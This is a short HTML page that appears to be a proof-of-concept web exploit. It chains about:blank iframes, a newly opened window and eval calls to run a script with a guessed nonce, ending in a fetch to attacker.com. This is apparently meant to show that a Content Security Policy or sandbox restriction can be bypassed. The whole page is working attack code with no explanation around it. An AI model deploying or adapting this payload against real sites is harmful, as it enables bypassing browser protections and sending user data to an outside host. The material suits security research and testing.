<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGxKcXnGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGxKcXnGGGGG.onload=_=>GGGGGxKcXnGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGxKcXnGGG src=about:blank><\/iframe><script nonce=123>GGGxKcXnGGG.onload=_=>GGGxKcXnGGG.contentWindow.eval(\x22fetch(`https://attacker.com/report/report`)\x22);GGGxKcXnGGG.contentWindow.location.reload();<\/script>');");GGGGGxKcXnGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>